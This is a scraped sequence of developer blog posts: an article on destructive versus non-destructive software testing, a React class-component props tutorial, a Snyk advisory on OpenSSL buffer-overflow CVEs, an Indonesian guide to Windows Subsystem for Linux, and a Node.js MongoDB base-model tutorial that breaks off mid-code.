Destructive testing is a discipline of systems engineering that checks the functionality of an application by trying to fail its application code. Destructive testing examines unpredictable user behavior within the software, which further helps uncover failure points that average usability doesn’t encounter. This involves special inspections carried out under stressful conditions until the software fails.
A destructive testing process involves introducing known flaws to the software and observing the error detection rate. The testing can be performed without knowledge of the original software requirements and usually goes through the following steps:
1. The **Client** sends a copy of the application and user requirements to the initial testing team
2. **Testing team** analyzes and provides the application’s minimum requirements to the security and quality analyst
3. **Security analyst** establishes the application’s function boundaries and develops the software’s usability limits.
4. **Security testers** then test the application within established boundaries and record the test workflows, errors and exceptions.
5. The **testing team** also shares the defect directory with the client/development team.
6. The testing cycle is repeated as the **client** requires or as defined in business requirements.
### Strategies for Destructive Software Testing
Some methods of performing destructive application testing include:
#### Failure point analysis
This involves a method of inspection using a review and examination of every processing path to determine what can fail at different points of the application configuration. Failure point analysis involves all three stages, including initial service testing, the identification of failure modes, and flaws’ effects to identify the application code sections that require change.
#### Peer review
The application is checked by a fellow developer/tester unfamiliar with the product features. This form of software testing helps developers uncover defects that are not visible to them while building the application code.
#### Exploratory testing
A type of testing where test cases are established on the fly to discover, investigate and remediate software flaws. Exploratory testing emphasizes learning and adaptability while following a session-based test management cycle. The testing mechanism is considered perfect as an initial service testing technique for a team with experienced testers.
#### Testing with invalid inputs
A security tester supplies the software with improper data in this testing technique, such as malformed inputs and wrong processes. As part of the analysis, testers analyze if the invalid test data is rejected and handled appropriately by the software.
### Types and Examples of Destructive Testing
Quality analysts can perform destructive testing through several techniques, including:
#### Regression testing
Regression tests are typically performed to assess if recent updates, bug fixes, or the introduction of new features do not break the application.
The code snippet below shows a regression test system for a Python program. The test runs a CLI program with a set of input files and then compares the output of each test iteration with the results of a previous test:
```
#!/usr/local/bin/python
import os, sys
from stat import ST_SIZE
from glob import glob
from os.path import exists
from time import time, ctime
print ‘RegTest start.’
print ‘user:’, os.environ[‘USER’]
print ‘path:’, os.getcwd( )
print ‘time:’, ctime(time( )), ‘\n’
program = sys.argv[1]
testdir = sys.argv[2]
for test in glob(testdir + ‘/*.in’):
if not exists(‘%s.out’ % test)
os.system(‘%s < %s > %s.out 2>&1’ % (program, test, test))
print ‘GENERATED:’, test
else:
os.rename(test + ‘.out’, test + ‘.out.bkp’)
os.system(‘%s < %s > %s.out 2>&1’ % (program, test, test))
os.system(‘diff %s.out %s.out.bkp > %s.diffs’ % ((test,)*3) )
if os.stat(test + ‘.diffs’)[ST_SIZE] == 0:
print ‘PASSED:’, test
os.remove(test + ‘.diffs’)
else:
print ‘FAILED:’, test, ‘(see %s.diffs)’ % test
print ‘RegTest done:’, ctime(time( ))
```
Assuming we had an executable script called darwin in a directory named test-folder1, the typical test run would look similar to:
```
% regtest.py darwin test-folder1
RegTest start.
user: mark
path: /home/mark/stuff/python/testing
time: Mon Feb 26 21:13:20 1996
FAILED: test1/t1.in (see test1/t1.in.diffs)
PASSED: test1/t2.in
FAILED: test1/t3.in (see test1/t3.in.diffs)
RegTest done: Wed Aug 24 08:13:27 2022
```
Here, ***darwin*** is run thrice ***(test1/t1.in, test2/t2.in,*** and ***test3/t3.in)***, and the result for each input file is compared to the results obtained for the same inputs in a previous test.
#### Boundary value testing
Boundary values denote the upper and lower limit of a variable. Boundary value testing helps analyze whether the software generates the correct output depending on the input value supplied.
Assume a [web application requires a password](https://crashtest-security.com/password-attack/) whose length is between 8 and 15 characters long. In such a case, the valid test cases can contain passwords with lengths of 8,9,10,11,12,13,14, and 15 characters. While all other password lengths will be marked invalid, the invalid test cases can be closer to the boundaries to test the application logic, such as 16-24 character and 0-7 character passwords.
The code snippet for a Python program ***(passValue.py)*** to test whether the supplied password is within the accepted values would look similar to:
```
userPass=input(“Enter your Password: “)
passValue=len(userPass)
maxValue=15
minValue=8
if passValue>maxValue:
print(“Password too long”)
elif passValue<minValue:
print(“Password too short”)
else:
print(‘Login successful’)
```
The program accepts a password string and stores it as ***userPass***. The code then checks the length of the supplied password and saves it as ***passValue***. Following this, the program compares the size of the password with the upper limit ***(maxValue)*** and the lower limit ***(minValue)***. As part of a destructive testing mechanism, the test involves supplying the application with passwords whose length is outside the specified boundaries. In a usual scenario, the program should prevent the user from entering a longer password by printing a warning as soon as they try logging in before they press enter.
## What is Non-destructive Testing in Application Development?
Contrary to destructive testing, the non-destructive testing technique involves interacting with the software using expected actions on the application. These tests allow security analysts to assess the software without damaging the application’s functionality. As such, the primary purpose of non-destructive testing is to verify if the system behaves as intended on receiving valid data inputs.
### Non-destructive Testing – When to Use
A non-destructive testing technique is primarily used with the intended flow of an application and forms the basis of initial testing to verify if the software meets business requirements. Test results of non-destructive testing help to identify flaws in functionality but not design while verifying if the software works fine when testers engage with the program appropriately.
Non-destructive testing uses precise values and test cases to follow the expected application flows and produce results. This test is recommended to be carried out at the onset of an SDLC to verify that only one happy path exists while eliminating all alternative scenarios that can produce a valid result.
A non-destructive testing approach offers cost savings, efficiency, accuracy, and application security since it allows the software to survive the test unharmed. The testing mechanism can also be performed on all software components since it does not impact the design or functionality.
## Destructive vs. Non-destructive Testing – Quick Comparison
The table below compares destructive and non-destructive testing techniques:
```
|---------------------------------|------------------------------|
| Destructive Testing | Non-destructive testing |
|---------------------------------|------------------------------|
|Tests for defects in design |Inspects flaws in |
| |functionality |
|---------------------------------|------------------------------|
|Can be performed without |Verifies application |
|knowledge of business |functionality against |
|requirements |acceptance criteria and |
| |business requirements |
|---------------------------------|------------------------------|
|Designed to break the software |Uses positive paths to engage |
|by supplying malformed inputs |the application without |
|to identify points of weakness |impacting the source code |
|---------------------------------|------------------------------|
```
## Automated Security Testing with Crashtest Security
Software testing is an interdisciplinary field of software engineering that utilizes multiple techniques to ensure the application is defect-free. Destructive testing involves breaking the application using malformed input or an unexpected user workflow to examine unpredictable behavior. Non-destructive testing, on the other hand, consists in engaging the software with the correct application workflow, allowing professionals to inspect the software without damaging it.
Modern deployments rely on multiple automated testing processes to ensure the detection and mitigation of security flaws. Through a suite of different vulnerability scanners, **Crashtest Security** helps automate comprehensive testing of an application stack to save time on vulnerability detection and remediation.
To know more about how Crashtest Security can help reduce risk exposure and mitigate critical security vulnerabilities, [try a free, 14-day demo today](https://crashtest.cloud/registration?utm_campaign=blog_reg&_ga=2.35332833.1981229621.1667295078-850523454.1667295078&_gl=1*g5960k*_ga*ODUwNTIzNDU0LjE2NjcyOTUwNzg.*_ga_3YDVXJ8625*MTY2NzM5NDc2My4xMS4xLjE2NjczOTczOTkuMzkuMC4w).
*This article has already been published on https://crashtest-security.com/non-destructive-testing/ and has been authorized by Crashtest Security for a republish.*
| sudip_sg | |
1,240,734 | 03.01 - State & Props - Send counter data to child component (class components) | App preview: Project files: src/App.js import React from "react"; import './App.css'; import... | 20,220 | 2022-11-04T22:29:06 | https://dev.to/adriangheo/0301-state-props-send-counter-data-to-child-component-class-components-37g1 | webdev, javascript, react, tutorial | App preview:

Project files:

<hr/>
src/App.js
```react
import React from "react";
import './App.css';
import ParentComponent from "./components/ParentComponent";
class App extends React.Component{
render(){
return(
<div className="App">
<h1>App.js</h1>
<ParentComponent/>
</div>
)
}
}
export default App;
```
<hr/>
src/App.css
```css
.App{
background-color: lightskyblue;
padding: 15px 10px;
}
h1, h2, h3{
margin-top: 0px;
margin-bottom: 6px;
padding-top: 0px;
padding-bottom: 0px;
}
```
<hr/>
<hr/>
src/components/ParentComponent.jsx
```react
import React from "react";
import ChildComponent from "./ChildComponent"
import "./ParentComponent.css"
class ParentComponent extends React.Component{
constructor(){
super();
this.state = {
count: 0
}
}
handleClick = () => {
this.setState((prevState)=>({count: prevState.count+1}))
}
render(){
return(
<div className="ParentComponent">
<h2>ParentComponent.jsx</h2>
<button onClick={()=>{this.handleClick()}}>Click me</button>
<br/><br/>
<ChildComponent count={this.state.count}/>
</div>
)
}
}
export default ParentComponent;
```
<hr/>
src/components/ParentComponent.css
```css
.ParentComponent{
background-color: lightcoral;
padding: 15px 10px;
}
```
<hr/>
<hr/>
src/components/ChildComponent.jsx
```react
import React from "react";
import "./ChildComponent.css"
class ChildComponent extends React.Component{
render(){
const {count} = this.props;
return(
<div className="ChildComponent">
<h3>ChildComponent.jsx</h3>
<p>The value of count is {count}.</p>
</div>
)
}
}
export default ChildComponent;
```
<hr/>
src/components/ChildComponent.css
```css
.ChildComponent {
background-color: lightgreen;
padding: 15px 10px;
}
```
| adriangheo |
1,241,010 | Update: OpenSSL high severity vulnerabilities | OpenSSL has released two high severity vulnerabilities — CVE-2022-3602 and CVE-2022-3786 — related to... | 0 | 2022-11-14T15:34:21 | https://snyk.io/blog/openssl-high-severity-vulnerabilities/ | applicationsecurity, engineering, opensource, vulnerabilities | ---
title: Update: OpenSSL high severity vulnerabilities
published: true
date: 2022-11-02 19:59:03 UTC
tags: ApplicationSecurity,Engineering,OpenSource,Vulnerabilities
canonical_url: https://snyk.io/blog/openssl-high-severity-vulnerabilities/
---
OpenSSL has released two high severity vulnerabilities — CVE-2022-3602 and CVE-2022-3786 — related to buffer overrun. OpenSSL initially rated CVE-2022-3602 as critical, but upon further investigation, it was reduced to high severity.
## What is Buffer overrun?
A buffer overrun/overflow is a specific type of runtime issue that allows a program to write past the end of a buffer or array and corrupt nearby memory — hence the name overflow. A buffer overflow does not appear during every program execution, like most issues do. Instead, specific conditions, such as unexpected user input, are required to activate the vulnerability.
**Both of the high severity vulnerabilities are exploited by name constraint checking during X.509 certificate verification.**
- X.509 Email Address 4-byte Buffer Overflow (CVE-2022-3602)
- X.509 Email Address Variable Length Buffer Overflow (CVE-2022-3786)
The vulnerability can be triggered in a TLS client by connecting to a rogue server. It could also be triggered on a TLS server if a malicious client joins when the server requests client authentication.
OpenSSL version 3.0.7 was released as an open source toolkit for SSL/TLS. Any OpenSSL 3.0 program should be regarded as insecure and exploitable by attackers if it checks X.509 certificates obtained from unreliable sources.
TLS client authentication should be disabled on clients and servers until the upgrade has been applied.
### Affected Versions
OpenSSL versions 3.0.0 to 3.0.6 are vulnerable to this issue.
### Unaffected versions
- 1.1.1
- 1.1.0
- 1.0.2
- 1.0.1
- 1.0.0
- 0.9.x
- fips
### Impact
- Denial of Service
- Remote Code Execution
## How can Snyk Help?
### Snyk Open Source
Now that the vulnerability details have been made available, Snyk Open Source projects will flag the [vulnerability](https://security.snyk.io/vuln?search=CVE-2022-3602) in their next retest. For projects configured for daily testing, that will happen within the next 24 hours. **Clients can, of course, manually trigger retests on critical projects to see these results sooner.**
You can also scan open source codewithin the Snyk CLI using the `snyk test` command.
### Snyk Container
When an advisory like the OpenSSL CVE is issued, each Linux distro maintainer then has to triage and issue their own advisory. It’s this distro advisory that triggers the detections in Snyk Container. This means there will likely be some lag between the OpenSSL advisory and the first Snyk Container detections, based on how quickly the Linux distro maintainers release their advisories. [Learn more about how this process works with our post on simplifying container security](https://snyk.io/blog/simplifying-container-security-snyk-expertise/).
Once that happens, you’ll see these detections flagged in Snyk Container test results. For both Snyk Open Source and Snyk Container, you’ll see results in reporting up to 9 hours after the above conditions are met due to existing data latency. This latency may be shorter when using the beta reporting to view issues.
## Recommendations
- OpenSSL 3.0 users should upgrade to OpenSSL 3.0.7.
- Stack overflow protections
## Update on the data for Ubuntu advisories in Snyk VulnDB
- [https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092607](https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092607) ([CVE-2022-3602](https://www.cve.org/CVERecord?id=CVE-2022-3602))
- [https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092568](https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092568) ([CVE-2022-3786](https://www.cve.org/CVERecord?id=CVE-2022-3786))
- [https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092584](https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092584) ([CVE-2022-3786](https://www.cve.org/CVERecord?id=CVE-2022-3786))
- [https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092591](https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092591) ([CVE-2022-3602](https://www.cve.org/CVERecord?id=CVE-2022-3602))
## References
- [https://www.openssl.org/news/vulnerabilities.html](https://www.openssl.org/news/vulnerabilities.html)
- [https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3090874](https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3090874) (CVE-2022-3602) [https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3092519](https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3092519) (CVE-2022-3786)
- [https://cve.org/CVERecord?id=CVE-2022-3786](https://cve.org/CVERecord?id=CVE-2022-3786)
- [https://cve.org/CVERecord?id=CVE-2022-3602](https://cve.org/CVERecord?id=CVE-2022-3602)
- [https://www.openssl.org/news/secadv/20221101.txt](https://www.openssl.org/news/secadv/20221101.txt) [https://mta.openssl.org/pipermail/openssl-announce/2022-November/000241.html](https://mta.openssl.org/pipermail/openssl-announce/2022-November/000241.html)
- [https://distrowatch.com/search.php?pkg=openssl&relation=similar&pkgver=3.&distrorange=InAny#pkgsearch](https://distrowatch.com/search.php?pkg=openssl&relation=similar&pkgver=3.&distrorange=InAny#pkgsearch)
- [https://nodejs.org/en/blog/vulnerability/november-2022-security-releases/](https://nodejs.org/en/blog/vulnerability/november-2022-security-releases/)
## Protect your applications for free
Create a Snyk account today to find and fix vulnerabilities in your code, dependencies, containers, and cloud infrastructure.
[Sign up for free](https://app.snyk.io/login?cta=sign-up&loc=body&page=update-openssl-high-severity-vulnerabilities)
<!-- /.block --> | snyk_sec |
1,241,092 | Pengertian Dasar Windows Subsystem for Linux (WSL), Pengguna Harus Tahu | Windows dan Linux adalah sistem operasi yang paling banyak digunakan di dunia. Namun keduanya tidak... | 0 | 2022-11-03T02:14:48 | https://dev.to/rino/pengertian-dasar-windows-subsystem-for-linux-wsl-pengguna-harus-tahu-1ep | linux | Windows dan Linux adalah sistem operasi yang paling banyak digunakan di dunia. Namun keduanya tidak bisa lebih berbeda. Windows adalah produk komersial dari Microsoft, salah satu perusahaan perangkat lunak terbesar di dunia. Sebaliknya, Linux, sebagai <strong>Free and open-source software (FOSS)</strong>, merupakan upaya bersama oleh ribuan sukarelawan.
Windows terutama digunakan di lingkungan pribadi dan bisnis. Linux berjalan di server dan komputer profesional dan individu pribadi. Banyak pengembang menggunakan Linux. Selain itu, sistem operasi terbuka merupakan dasar dari sistem operasi seluler Android.
Windows Subsystem for Linux (WSL) memungkinkan pengguna Windows mengakses ke ribuan paket aplikasi dan tool open source yang tersedia secara gratis. Sebelumnya, ini memerlukan pengaturan mesin virtual atau me-reboot komputer di lingkungan Linux dual-boot khusus. Namun, dengan WSL, yang diperlukan hanyalah beberapa klikb saja.
<h2>Apa itu Windows Subsystem for Linux?</h2>
Windows Subsystem for Linux adalah lapisan kompatibilitas yang memungkinkan program Linux asli dijalankan langsung dari baris perintah Windows. Secara khusus, WSL memungkinkan binari Linux 64-bit untuk dieksekusi dalam Executable and Linkable Format (ELF) standar.
Subsistem Windows untuk Linux tersedia mulai dengan Windows 10. Tetapi minat Microsoft dalam membuatnya lebih mudah bagi pengguna Windows untuk bekerja dengan alat Linux dari lingkungan desktop yang mereka kenal sudah ada sejak lama. Misalnya, WSL muncul dari proyek "Microsoft Windows Services for UNIX" (SFU/Interix), yang pada gilirannya merupakan pengembangan lebih lanjut dari "subsistem POSIX" yang sudah terintegrasi dalam Windows NT. Dengan Windows Subsystem for Linux 2 (WSL2) pengembangan ini terus berlanjut.
Sebelum WSL dirilis, pengguna harus mencoba menggabungkan aspek-aspek terbaik dari dunia Windows dan Linux. Pada prinsipnya, ada dua cara untuk membuat program Linux berjalan di Windows:
<ol>
<li><strong>Penggunaan mesin virtual. </strong>Instalasi Linux yang lengkap digunakan sebagai komputer virtual di bawah Windows. Pendekatan ini ramah pengguna dan memungkinkan penggunaan penuh aplikasi Linux apa pun, tetapi membutuhkan beberapa sumber daya perangkat keras. Selain itu, ada keterbatasan pertukaran antara menjalankan program pada dua sistem operasi.</li>
<li><strong>Penggunaan lingkungan runtime Linux Cygwin.</strong> Ini diinstal di bawah Windows dan memungkinkan penggunaan banyak program Linux populer. Pertukaran antara program Windows dan Linux dimungkinkan dengan Cygwin, tetapi sampai batas tertentu.</li>
</ol>
Selain itu, pengguna dapat mengatur Linux paralel dengan instalasi Windows yang sudah ada. Namun demikian, pengaturan ini, yang dikenal sebagai <a href="https://mobiledailytekno.blogspot.com/2022/11/cara-membuat-dual-boot-di-windows-10.html">dual boot</a>, mengharuskan komputer dihidupkan ulang untuk beralih ke sistem operasi masing-masing. Oleh karena itu, bertukar antara program yang berjalan dari Windows dan Linux tidak dimungkinkan dengan opsi ini.
Subsistem Windows untuk Linux tidak memerlukan mesin virtual dan oleh karena itu kinerjanya baik. Namun, tidak ada kernel Linux yang lengkap, sehingga tidak semua aplikasi didukung.
Secara khusus, WSL sendiri tidak memungkinkan eksekusi program Linux dengan antarmuka pengguna grafis (GUI). Ada beberapa metode untuk ini juga, tetapi mereka memerlukan langkah tambahan untuk instalasi dan konfigurasi.
<h2>Apa persyaratan menggunakan WSL?</h2>
Sebenarnya, tidak ada persyaratan sistem khusus yang diperlukan untuk menggunakan Windows Subsystem for Linux. Komputer Anda hanya perlu memiliki prosesor x64 atau ARM, yang berlaku pada hampir semua sistem modern. Selain itu, diperlukan Windows 10 64-bit versi 1709 ke atas.
Jika tidak yakin edisi dan versi Windows mana yang digunakan, Anda dapat memeriksanya dengan langkah-langkah berikut ini:
<ul>
<li>Tekan tombol logo Windows + [R], ketik "winver" di kotak teks yang muncul, dan tekan [Enter].</li>
<li>Atau, klik Mulai > Pengaturan > Sistem > Tentang > Spesifikasi Windows dan baca nilainya di sana.</li>
</ul>
<h2>Bagaimana menginstal Windows Subsystem for Linux?</h2>
Proses mengaktifkan Windows Subsystem for Linux pada sebuah sistem sangatlah mudah. Kami akan menunjukkan prosesnya di sini untuk pengguna rumahan. Simak langkah-langkahnya berikut:
<ol>
<li>Klik Mulai > Panel Kontrol > Program > Program dan Fitur > Aktifkan atau Nonaktifkan Fitur Windows.</li>
<li>Beri tanda centang di sebelah "Windows Subsystem for Linux".</li>
<li>Hidupkan Kembali komputer.</li>
<li>Buka Microsoft Store dan cari "Linux". Nanti akan disajikan dengan pilihan distribusi Linux yang tersedia.</li>
<li>Klik distribusi Linux yang diinginkan, lalu klik Instal. Jika tidak yakin distribusi mana yang tepat untuk Anda, kami sarankan untuk menginstal "Ubuntu Linux".</li>
<li>Setelah instalasi selesai, klik "Mulai".</li>
<li>Di jendela yang muncul, paket download dan dibongkar pada awal pertama. Ini mungkin memakan waktu beberapa menit. Terakhir, akan diminta untuk menetapkan nama pengguna dan kata sandi untuk instalasi Linux yang baru.</li>
</ol>
<strong>Catatan:</strong>
Anda dapat menjalankan beberapa distribusi Linux secara paralel dengan WSL. Dalam hal ini, buat akun pengguna terpisah untuk setiap distribusi.
Sebagai alternatif dari dua langkah pertama, bisa juga menggunakan perintah PowerShell berikut ini untuk mengaktifkan Windows Subsystem for Linux. Harap perhatikan perlunya menjalankan perintah sebagai administrator. Setelah eksekusi, restart komputer dan ikuti instruksi kami dari langkah 4.
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux</code></pre>
<h2>Beberapa Perintah WSL</h2>
Manakah langkah pertama setelah mengaktifkan WSL dan menginstal distribusi Linux? Hal ini tergantung pada tujuan dari WSL. Pengembang web biasanya membutuhkan profil aplikasi yang berbeda dari pengembang aplikasi. Kami akan merangkum beberapa langkah menggunakan perintah WSL yang sering dibutuhkan.
<h3>Tampilkan dan kendalikan WSL yang terinstal</h3>
Alat Windows wsl.exe digunakan pada baris perintah untuk mengontrol distribusi Linux yang diinstal. Buka baris perintah dan masukkan perintah berikut untuk menampilkan opsi yang tersedia dari perintah wsl:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">wsl --help</code></pre>
<h3>Menampilkan distribusi Linux</h3>
Anda dapat menggunakan Subsistem Windows untuk Linux untuk menginstal dan menggunakan beberapa distribusi Linux. Jalankan perintah berikut pada baris perintah untuk mendapatkan gambaran umum tentang distribusi yang diinstal:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">wsl --list --verbose</code></pre>
<h3>Memulai distribusi Linux default</h3>
Untuk memulai distribusi Linux sebagai default, cukup dengan menjalankan perintah wsl tanpa parameter lain:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">wsl</code></pre>
Setelah itu, Anda akan masuk sebagai pengguna Linux dan dapat langsung mengakses perintah Linux yang dikenal.
<h3>Memperbarui distribusi Linux</h3>
Segera setelah Anda masuk ke distribusi Linux untuk pertama kalinya, perbarui paket perangkat lunak yang diinstal, menggunakan perintah berikut:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">sudo apt update && sudo apt upgrade</code></pre>
Karena ini adalah operasi yang memiliki pengaruh seluruh sistem di tingkat Linux, perintah dimulai dengan "sudo". kemudian harus memasukkan kata sandi yang ditetapkan selama instalasi distribusi Linux.
<h3>Menginstal Git</h3>
Git adalah alat yang paling banyak digunakan untuk membuat proyek kode versi. Untuk menginstal Git dalam distribusi Linux, gunakan perintah berikut:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">sudo apt install git</code></pre>
<h3>Menggunakan alat Linux dari Windows</h3>
Anda telah melihat cara masuk ke distribusi Linux menggunakan alat wsl dan kemudian menggunakan perintah Linux. Selain itu, ada metode alternatif. Kamu bisa <strong>jalankan perintah Linux langsung dari shell Windows</strong>. Ini bisa berguna, misalnya, untuk menggunakan perintah Linux di skrip PowerShell. Cukup tambahkan perintah Linux ke panggilan alat wsl:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed"># use Linux-Command `ls` to output contents of the current directory
wsl ls -la</code></pre>
<h3>Menggunakan tool Windows dari command prompt Linux</h3>
Seperti yang Anda lihat, dapat menggunakan perintah WSL Linux untuk jalankan skrip langsung dari baris perintah Windows atau dari PowerShell. Ini juga bekerja sebaliknya: Anda dapat menggunakan alat baris perintah Windows pada command prompt Linux atau dalam skrip Linux. Alat baris perintah dapat digabungkan seperti perintah Linux biasa.
Di sini kita akan menggunakan alat Windows <strong>ipconfig.exe</strong> untuk menampilkan informasi jaringan dalam kombinasi dengan alat Linux grep untuk memfilter hasil IPv4 dan memotong untuk menghapus bidang kolom:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">ipconfig.exe | grep IPv4 | cut -d: -f2</code></pre>
<h2>Cara Mengaktifkan Windows Subsystem for Linux</h2>
WSL berfungsi untuk menggunakan perintah Linux pada baris dalam skrip. Cara ini dapat digunakan untuk menghubungkan alat Windows dan Linux. Sehingga membuat WSL sangat relevan untuk pengembang.
Khususnya untuk pengembangan web dan pemrograman open source, akan lebih mudah dengan mengaktifkan WSL. Berikut ini cara mengaktifkan Windows Subsystem for Linux.
<ol>
<li>Instal satu atau lebih distribusi Linux dari Microsoft Store.</li>
<li>Gunakan alat baris perintah populer seperti "grep", "sed" dan "awk".</li>
<li>Jalankan binari ELF-64 lainnya.</li>
<li>Jalankan skrip untuk shell Bash dan lingkungan shell lainnya.</li>
<li>Gunakan aplikasi berbasis terminal seperti “vim”, “emacs”, dan “tmux”.</li>
<li>Gunakan bahasa pemrograman dan alat terkait, misalnya, NodeJS, Javascript, Python, Ruby, C/C++, C# & F#, Rust, Go, dll.</li>
<li>Jalankan layanan Linux di mesin Anda, misalnya SSHD, MySQL, Apache, lighttpd, MongoDB, <a href="https://m3dcam.live-website.com/instal-postgresql-di-windows-server-2016/">PostgreSQL</a>, dll.</li>
<li>Instal perangkat lunak tambahan menggunakan manajer paket distribusi Linux.</li>
<li>Aktifkan aplikasi Windows menggunakan baris perintah mirip Unix.</li>
<li>Jalankan aplikasi Linux di Windows.</li>
</ol>
Sekian dulu artikel tentang WSL atau Windows Subsystem for Linux. Semoga bermanfaat. | rino |
1,241,333 | 31-Nodejs Course 2023: Database Models: Create Base Model | So we got to know about database models in the previous article, now let's create a base model that... | 20,274 | 2022-11-03T10:59:44 | https://dev.to/hassanzohdy/31-nodejs-course-2023-database-models-create-base-model-19pd | node, typescript, mongodb, fastify | ---
title: 31-Nodejs Course 2023: Database Models: Create Base Model
published: true
description:
series: Nodejs Course 2023
tags: nodejs, typescript, mongodb, fastify
#cover_image:
# Use a ratio of 100:42 for best results.
---
So we got to know about database models in the previous article, now let's create a base model that we'll use to create other models.
## Model Structure
Before we getting started, let's illustrate how the model structure works, we have 4 main parts:
- Static Variables: These variables will be access directly without creating an instance of the model, for example, the collection name.
- Static Methods: These methods will be access directly without creating an instance of the model, for example, the `find` method.
- Instance Variables: These variables will be access after creating an instance of the model, for example, the `name` variable.
- Instance Methods: These methods will be access after creating an instance of the model, for example, the `save` method.
Static variables will be mainly for the meta data of the model which will be used to collect information about the model like the collection name, the initial id value and so on.
The static method will be used for quick access and operations that are not related to a specific instance of the model, for example, the `find` method.
## Base Model
Go to `src/core/database` folder and create `model` folder inside it then create `model.ts` file.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
}
```
Nothing fancy here, just a base model class that we'll extend in other models.
We're making it abstract because we don't want to use it directly, we'll use it as a base class for other models to inherit from.
The collection name will be a static property that we'll override in the child classes so we can access the collection name from the model class directly without creating an instance of it.
You might wonder that we did a file called `model.ts` inside `model` directory not `index.ts` that's because we're going to create more files inside the `model` directory so we'll make the `index.ts` file for the exports only.
Now let's create the index.file and export the base model from it.
```ts
// src/core/database/model/index.ts
export { default as Model } from './model';
```
Then go to `database/index.ts` file and export all from the `model/index.ts` fike.
```ts
// src/core/database/index.ts
export * from './model';
```
This will allow us to access the `Model` class by importing it like this:
```ts
import { Model } from 'core/database';
```
## Users Model
Now let's create a new file called `user.ts` in `src/app/users/models` directory.
```ts
// src/app/users/models/user.ts
import { Model } from 'core/database';
export default class User extends Model {
/**
* Collection Name
*/
public static collectionName = "users";
}
```
Now we have a base model and a user model that extends it then we added the collection name to the user model.
Pretty easy, nothing fancy here but still these are just an empty files without soul (not database yet).
We can now get the collection name directly like this:
```ts
import User from 'app/users/models/user';
console.log(User.collectionName); // users
```
Let's create its soul.
## Database Connection
Heading back to our base model, let's define a database connection property.
```ts
// src/core/database/model/model.ts
import connection, { Connection } from './../connection';
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
}
```
We'll use our own connection so we can use it to access the connection (If needed) and we can of course access the database handler directly from it.
## Collection Query
Now let's define a collection method to return the collection query handler.
```ts
// src/core/database/model/model.ts
import { Collection } from "mongodb";
import connection, { Connection } from './../connection';
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
/**
* Get Collection query
*/
public static query(): Collection {
return this.connection.database.collection(this.collectionName);
}
}
```
In javascript, accessing static properties can be used with `this` keyword.
We need to make sure that the connection's database property is always exists as it may throw an error as it is possibly undefined.
```ts
// src/core/database/connection.ts
/**
* Database instance
*/
// 👇🏻Replace the ?: with !:
public database!: Database;
```
So far so good, now we're don with static methods, let's implement the non static ones that we need.
At this point, we can now access the users collection like this:
```ts
import User from 'app/users/models/user';
// get the collection query
const usersCollection = User.query();
await usersCollection.find().toArray();
```
## Accessing Child Static Property From Parent Class
In the model it self when we create a new instance (object) of it, we need to access the collection of the model to make internal operations, like saving the user's data to the database, so we need to access the `query` method from the child class.
We can't access the static property of `a child class from the parent class` if we created an instance of that child, so we need to do a trick to access it.
To access the child class static members, we'll use `this.constructor` feature.
```ts
// src/core/database/model/model.ts
import connection, { Connection } from './../connection';
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.constructor.collectionName;
}
}
```
But Typescript will start complaining, because it doesn't know that the `constructor` property is a class.
To fix this, we'll use the `typeof` keyword to tell Typescript that the `constructor` property is a class.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
// ...
/**
* Get Collection Name
*/
public getCollectionName(): string {
return (this.constructor as typeof Model).collectionName;
}
}
```
We can wrap it in a private method so we can use it in other methods by passing only the static property that we need to get.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
// ...
/**
* Get Static Property
*/
protected getStaticProperty<T>(property: keyof typeof Model): T {
return (this.constructor as any)[property];
}
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.getStaticProperty('collectionName');
}
}
```
The `keyof typeof Model` will tell Typescript that the `property` parameter is a key of the `Model` class so we can use the auto complete feature to get the static property that we need to get.
## Getting Connection, Database and Collection Query
Now we can use the `getStaticProperty` method to get the connection, database and collection query.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
// ...
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.getStaticProperty("collectionName");
}
/**
* Get database connection
*/
public getConnection(): Connection {
return this.getStaticProperty("connection");
}
/**
* Get database instance
*/
public getDatabase(): Database {
return this.getConnection().database;
}
/**
* Get Collection Query
*/
public getQuery(): Collection {
return this.getStaticProperty("query");
}
}
```
So our final model class will look like this:
```ts
import { Collection } from "mongodb";
import { Database } from "../database";
import connection, { Connection } from "./../connection";
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
/**
* Get Collection query
*/
public static query(): Collection {
return this.connection.database.collection(this.collectionName);
}
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.getStaticProperty("collectionName");
